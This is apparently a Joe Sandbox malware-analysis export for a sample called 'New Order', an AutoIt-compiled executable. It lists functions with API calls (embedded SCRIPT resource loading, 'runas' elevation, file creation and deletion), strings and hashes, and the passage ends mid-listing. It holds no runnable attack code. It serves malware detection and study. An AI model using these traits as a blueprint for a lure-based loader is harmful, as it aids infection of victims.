Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: af77ba308fd014a038d163177b2daefe8cebcf844ae92efa8f9628e1b9e68264
Instruction ID: 9f206b357bbaa9956b343cb6a6a755a4268aea4504c08a7626b325a582560581
Opcode Fuzzy Hash: af77ba308fd014a038d163177b2daefe8cebcf844ae92efa8f9628e1b9e68264
Instruction Fuzzy Hash: ADA1E46EA2A3C2DFC727DB797CD06A67FBC6B26300F14559ED441B3A61D2620508CB21

Function 002C42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,002C50AA,?,?,00000000,00000000), ref: 002C42B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,002C50AA,?,?,00000000,00000000), ref: 002C42C9
LoadResource.KERNEL32(?,00000000,?,?,002C50AA,?,?,00000000,00000000,?,?,?,?,?,?,002C4F20), ref: 003035BE
SizeofResource.KERNEL32(?,00000000,?,?,002C50AA,?,?,00000000,00000000,?,?,?,?,?,?,002C4F20), ref: 003035D3
LockResource.KERNEL32(002C50AA,?,?,002C50AA,?,?,00000000,00000000,?,?,?,?,?,?,002C4F20,?), ref: 003035E6

Strings

SCRIPT, xrefs: 002C42BF

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 4e420b7cb182ab7127dc4553597512e2ec38bfc20c94aae02c2cb3589ebd85fa
Instruction ID: 44c6b0136ff10dc4408e56813cfa4d1b202c0d95e430892c0583f3cedb2734c0
Opcode Fuzzy Hash: 4e420b7cb182ab7127dc4553597512e2ec38bfc20c94aae02c2cb3589ebd85fa
Instruction Fuzzy Hash: 1211AC70210301BFEB229B65DC49F277BBDEBC5B56F20466EF802862A0DB71D810D621

Function 00302BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 002C2B6B

Part of subcall function 002C3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00391418,?,002C2E7F,?,?,?,00000000), ref: 002C3A78

Part of subcall function 002C9CB3: _wcslen.LIBCMT ref: 002C9CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,00382224), ref: 00302C10
ShellExecuteW.SHELL32(00000000,?,?,00382224), ref: 00302C17

Strings

runas, xrefs: 00302C0B

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: a1e1233660617a7b181918aa25c61b6e1625ea6029f1ef3765e5d003aede52d4
Instruction ID: 736c1c2ac45e5d9ba8b3597aeeeddd17f0ffc086177e41b3e57406ce311c3df2
Opcode Fuzzy Hash: a1e1233660617a7b181918aa25c61b6e1625ea6029f1ef3765e5d003aede52d4
Instruction Fuzzy Hash: 0411E9312283469EC716FF60D855FBEB7A89F95304F445B6DF082530A2CF218A6ECB52

Function 0032DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00305222), ref: 0032DBCE
GetFileAttributesW.KERNELBASE(?), ref: 0032DBDD
FindFirstFileW.KERNELBASE(?,?), ref: 0032DBEE
FindClose.KERNEL32(00000000), ref: 0032DBFA

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 846ac17a5538098438a20de861507d88a050de61c8b7f491e16e82c0e2981c50
Instruction ID: be1efb7e855b30ab9cef521b2a6489d692cbed1eb83319cbf675fdedb74c97bd
Opcode Fuzzy Hash: 846ac17a5538098438a20de861507d88a050de61c8b7f491e16e82c0e2981c50
Instruction Fuzzy Hash: 52F0A030820B305BC2226B78BC0D8AA376C9E0133AF104B02F836D20F0EBB05954C696

Function 002CD730 Relevance: 21.6, APIs: 14, Instructions: 631windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 002CD807
timeGetTime.WINMM ref: 002CDA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002CDB28
TranslateMessage.USER32(?), ref: 002CDB7B
DispatchMessageW.USER32(?), ref: 002CDB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002CDB9F
Sleep.KERNEL32(0000000A), ref: 002CDBB1

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 121473f7f915d7a9c20f458336ab46ed51466a97d0032500f54470b1bafd898e
Instruction ID: 46d2281502b67adf4fbdf45685df4efb876634d6853f6d07f938a93a67c55245
Opcode Fuzzy Hash: 121473f7f915d7a9c20f458336ab46ed51466a97d0032500f54470b1bafd898e
Instruction Fuzzy Hash: 9C42E330628742DFD72ACF24C885FAAB7E4BF49304F15462EE455872A1D771E8A4CF92

Function 002C2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 002C2D07
RegisterClassExW.USER32(00000030), ref: 002C2D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002C2D42
InitCommonControlsEx.COMCTL32(?), ref: 002C2D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002C2D6F
LoadIconW.USER32(000000A9), ref: 002C2D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002C2D94

Strings

AutoIt v3 GUI, xrefs: 002C2D23
+, xrefs: 002C2CF0
0, xrefs: 002C2CE9
TaskbarCreated, xrefs: 002C2D37

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: d95657c13a04988f770e3adf0edaa2655ec97452a63227dad2f2eed3cbf3ba7a
Instruction ID: 188e65e76f963e64daf0b9a60532665633c4f3a58bc166ae3698954616fe9eea
Opcode Fuzzy Hash: d95657c13a04988f770e3adf0edaa2655ec97452a63227dad2f2eed3cbf3ba7a
Instruction Fuzzy Hash: 5D21C3B5921319AFDB02DFA4EC89BDDBBB8FB08709F10511AF911B62A0D7B24544CF91

Function 002F8D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

.., xrefs: 002F903A, 002F8FD0, 002F8FF2

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID:
String ID: ..
API String ID: 0-1970295553
Opcode ID: 5996e281c1b9524b09da1ca87be2704103802d5d64cc58010bd36cbda8a514a1
Instruction ID: d3ceb9ac972234dacdfee4b62b44ce0c13b6185160dbe5eaaa68fa46db9940af
Opcode Fuzzy Hash: 5996e281c1b9524b09da1ca87be2704103802d5d64cc58010bd36cbda8a514a1
Instruction Fuzzy Hash: BEC1147592424EAFCB11DFA8D840BBDFBB4AF09350F044169FA15A7392CB718991CF20

Function 0030065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0030039A: CreateFileW.KERNELBASE(00000000,00000000,?,00300704,?,?,00000000,?,00300704,00000000,0000000C), ref: 003003B7

GetLastError.KERNEL32 ref: 0030076F
__dosmaperr.LIBCMT ref: 00300776
GetFileType.KERNELBASE(00000000), ref: 00300782
GetLastError.KERNEL32 ref: 0030078C
__dosmaperr.LIBCMT ref: 00300795
CloseHandle.KERNEL32(00000000), ref: 003007B5
CloseHandle.KERNEL32(?), ref: 003008FF
GetLastError.KERNEL32 ref: 00300931
__dosmaperr.LIBCMT ref: 00300938

Strings

H, xrefs: 003008BD

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 232cd431034cfa25c2f8a5acbbd331b10b6bcc4cff97a8ce9d1bf1367037875c
Instruction ID: 5dd9335871bd4f03ccf480c1e8e4da4d104e101f7ecb6e724407ebb391952071
Opcode Fuzzy Hash: 232cd431034cfa25c2f8a5acbbd331b10b6bcc4cff97a8ce9d1bf1367037875c
Instruction Fuzzy Hash: 5EA13632A102488FDF1EAF68DC61BAE7BA4EB06320F14415AF8159F2E1D7359D12CB91

Function 002C344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 002C3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00391418,?,002C2E7F,?,?,?,00000000), ref: 002C3A78

Part of subcall function 002C3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 002C3379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 002C356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0030318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003031CE
RegCloseKey.ADVAPI32(?), ref: 00303210
_wcslen.LIBCMT ref: 00303277
_wcslen.LIBCMT ref: 00303286

Strings

\Include\, xrefs: 002C3527
\, xrefs: 0030328C
Include, xrefs: 00303184, 003031C5
Software\AutoIt v3\AutoIt, xrefs: 002C3560

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 74cc0321444a486f54f9d1cf51bf2e65ae763fca385f2a1e3fbebbad97e8e03d
Instruction ID: 29c155ea965fa1ebe8845b8f24ebf939345644115bb0b9cb74f63474c5a93883
Opcode Fuzzy Hash: 74cc0321444a486f54f9d1cf51bf2e65ae763fca385f2a1e3fbebbad97e8e03d
Instruction Fuzzy Hash: 16718D75515701AEC316EF25DC92DABBBECFF89340F404A2EF445831A0EB319A48CB91

Function 002C2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 002C2B8E
LoadCursorW.USER32(00000000,00007F00), ref: 002C2B9D
LoadIconW.USER32(00000063), ref: 002C2BB3
LoadIconW.USER32(000000A4), ref: 002C2BC5
LoadIconW.USER32(000000A2), ref: 002C2BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 002C2BEF
RegisterClassExW.USER32(?), ref: 002C2C40

Part of subcall function 002C2CD4: GetSysColorBrush.USER32(0000000F), ref: 002C2D07
Part of subcall function 002C2CD4: RegisterClassExW.USER32(00000030), ref: 002C2D31
Part of subcall function 002C2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002C2D42
Part of subcall function 002C2CD4: InitCommonControlsEx.COMCTL32(?), ref: 002C2D5F
Part of subcall function 002C2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002C2D6F
Part of subcall function 002C2CD4: LoadIconW.USER32(000000A9), ref: 002C2D85
Part of subcall function 002C2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002C2D94

Strings

0, xrefs: 002C2C0F
#, xrefs: 002C2C16
AutoIt v3, xrefs: 002C2C2F

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 41d8cd55fb6a69e25f22f62a1e30de48260fd4fa979f525a3888dfe16f33ab5b
Instruction ID: ab9a86d84ef345ce0d02c6c96ea633e413fb516151ea8c6dc034f90dd4693834
Opcode Fuzzy Hash: 41d8cd55fb6a69e25f22f62a1e30de48260fd4fa979f525a3888dfe16f33ab5b
Instruction Fuzzy Hash: B1212979E10319AFDB229FA6EC95BAD7FB8FB48B54F04411BE504B66A0D7B20540CF90

Function 002CB710 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 002CBB4E

Strings

p#9, xrefs: 002CBA72
p%9, xrefs: 002CB8DC
p#9, xrefs: 002CBB6B
p#9, xrefs: 0031024F
p#9, xrefs: 00310263
x#9, xrefs: 00310207
p%9, xrefs: 002CBB32
x#9, xrefs: 00310168

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Init_thread_footer
String ID: p#9$p#9$p#9$p#9$p%9$p%9$x#9$x#9
API String ID: 1385522511-2266461043
Opcode ID: 0184f4072a0230978a38b3f7de55e8fdaf06a51e838afb7ed3b3e9afaeff510c
Instruction ID: 310178c9bfe389c92dfe72d549024adb9445b8fc9a2b488c3cadbb9ee333d90f
Opcode Fuzzy Hash: 0184f4072a0230978a38b3f7de55e8fdaf06a51e838afb7ed3b3e9afaeff510c
Instruction Fuzzy Hash: 4532DE38A10209EFCF1ACF54C885FBEB7B9EF48304F15815AE915AB251C7B5AD91CB90

Function 002C3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,002C316A,?,?), ref: 002C31D8
KillTimer.USER32(?,00000001,?,?,?,?,?,002C316A,?,?), ref: 002C3204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 002C3227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,002C316A,?,?), ref: 002C3232
CreatePopupMenu.USER32 ref: 002C3246
PostQuitMessage.USER32(00000000), ref: 002C3267

Strings

TaskbarCreated, xrefs: 002C322D

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: bfb84fefa39aa5f27d342955f0b8121ae3c550b00a5d8bbd9ba6cff75df5ca0b
Instruction ID: 4c1cf78cc2e45f7071ebe91af5f4e3e1cdd4f4cc08b2af77df44386cfbff20f4
Opcode Fuzzy Hash: bfb84fefa39aa5f27d342955f0b8121ae3c550b00a5d8bbd9ba6cff75df5ca0b
Instruction Fuzzy Hash: 50412935270202AEDF179B389D5EFB93A2DE705344F08871EF915955A1C7E18E209BA2

Function 002CDFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON

Download Yara Rule

Strings

D%9, xrefs: 002CE4B1
D%9D%9, xrefs: 002CE27E
D%9, xrefs: 0031302D
Variable must be of type 'Object'., xrefs: 003132B7
D%9, xrefs: 002CE1E0
D%9, xrefs: 00312FDA

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID:
String ID: D%9$D%9$D%9$D%9$D%9D%9$Variable must be of type 'Object'.
API String ID: 0-1327069127
Opcode ID: b8288350638ddc577b075745f254afe672bca525bd5fd98c6a1b4173016f50e0
Instruction ID: ab144aab4bb231554336409cb23eb718b7f2294079ea2e2ead980df8f9dfcce4
Opcode Fuzzy Hash: b8288350638ddc577b075745f254afe672bca525bd5fd98c6a1b4173016f50e0
Instruction Fuzzy Hash: 83C28A71A10605DFCF24CF58C881FADB7B5BF09310F268669E906AB391D371ADA1CB91

Function 014C2600 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 014C26D1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 014C28F7

Memory Dump Source

Source File: 00000000.00000002.1263038001.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14c0000_New Order.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
Instruction ID: 103627ffd59e58ab5f92a35302d43f2eef26a35ced1debe0fc2822b08c87261b
Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
Instruction Fuzzy Hash: 71A1F978E00209EBDB54CFA4C894FEEBBB5BF48704F10855EE605BB290D7B59A41CB64

Function 002C2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002C2C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 002C2CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,002C1CAD,?), ref: 002C2CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,002C1CAD,?), ref: 002C2CCF

Strings

edit, xrefs: 002C2CAC
AutoIt v3, xrefs: 002C2C89, 002C2C8E, 002C2C8F

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: db54a3dcfbec963a146ff28e6036c4b1429044b09f3db45c3e2da4358a652db2
Instruction ID: 4a8873b54037a85b19212096173194a53719a7f8216abfbe3154f8d4e9cd76c5
Opcode Fuzzy Hash: db54a3dcfbec963a146ff28e6036c4b1429044b09f3db45c3e2da4358a652db2
Instruction Fuzzy Hash: A9F0DA795503917EEB331727AC88EB72EBDD7CAF55F00105AF904A25B0C6B21854DAB0

Function 014C23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 014C22A0: Sleep.KERNELBASE(000001F4), ref: 014C22B1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 014C24EE

Strings

CS9N20BET8Y1P839RKIFY, xrefs: 014C2551, 014C2554

Memory Dump Source

Source File: 00000000.00000002.1263038001.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14c0000_New Order.jbxd

Similarity

API ID: CreateFileSleep
String ID: CS9N20BET8Y1P839RKIFY
API String ID: 2694422964-1135726652
Opcode ID: f10bb9ba3ae07c4f0a21a7bb4970a37fb9dfff076289c8dc613f3a162f1babae
Instruction ID: 883a0b1ead6b9dbd2866c477342cdf6734effe8cad8807c5e881060a220441b8
Opcode Fuzzy Hash: f10bb9ba3ae07c4f0a21a7bb4970a37fb9dfff076289c8dc613f3a162f1babae
Instruction Fuzzy Hash: 7E519074D04248EBEB11DBA4C854BEFBBB9AF14704F00419DE249BB2C1D6BA0B45CB65

Function 00332947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00332C05
DeleteFileW.KERNEL32(?), ref: 00332C87
